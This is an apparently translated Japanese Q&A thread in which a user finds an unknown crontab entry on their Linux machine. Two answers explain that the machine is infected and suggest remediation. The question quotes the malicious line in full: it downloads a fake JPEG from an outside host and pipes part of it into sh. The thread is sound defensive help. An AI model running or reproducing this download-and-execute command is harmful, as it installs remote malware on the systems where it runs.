私のLinuxのCrontabエントリは毎日削除されます。私はこの項目を追加し、次の日に確認したときに私が見つけることができるものは次のとおりです。
*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh
同時に、rootユーザーのcrontabエントリはまだ存在します。
答え1
シェルスクリプト(JPEGに偽装)をダウンロードして実行するためのcrontabエントリは、システムが破損していることを示す強力なマークです。影響を受けたコンピュータをシャットダウンし、ITチームに何をすべきかを問い合わせる必要があります。
(この破損が原因でcrontabエントリが消える原因になる可能性があります。おそらく誤ってホストされているすべてのマルウェアがcrontabを上書きする可能性があります。)
答え2
あなたのシステムは「lady linux」ウイルスに感染しており、セキュリティを最適化する必要があります。不思議なファイルが存在するかどうか「/tmp」フォルダを確認し、未使用のTCP / UDPポートをブロックし、サーバーのアウトバウンドターゲットooo.0o0.oooをブロックします。しかし、問題の原因を見つけるのは難しいでしょう。